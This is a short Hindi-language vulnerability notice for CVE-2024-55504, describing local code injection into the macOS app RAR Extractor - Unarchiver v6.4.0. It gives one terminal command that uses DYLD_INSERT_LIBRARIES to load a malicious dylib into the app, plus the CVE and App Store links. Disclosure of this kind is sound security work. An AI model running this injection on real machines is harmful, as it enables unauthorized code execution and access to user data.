
CVE-2024-55504
CVE-2024-55504 में एक समस्या: RAR Extractor - Unarchiver Free और Pro v.6.4.0 स्थानीय हमलावरों को MacOS पर exploit_combined.dylib घटक के माध्यम से मनमाना कोड इंजेक्ट करने की अनुमति देता है, जो संभावित रूप से रिमोट कंट्रोल और संवेदनशील उपयोगकर्ता डेटा तक अनधिकृत पहुंच का कारण बन सकता है।
टर्मिनल से
DYLD_INSERT_LIBRARIES=exploit_combined.dylib /Applications/RAR\ Extractor\ -\ Unarchiver\ Pro.app/Contents/MacOS/RAR\ Extractor\ -\ Unarchiver\ Pro

कोड निष्पादन (स्थानीय)
https://apps.apple.com/us/app/rar-extractor-unarchiver-pro/id647505820?mt=12
https://www.cve.org/CVERecord?id=CVE-2024-55504
Zaid Hamad द्वारा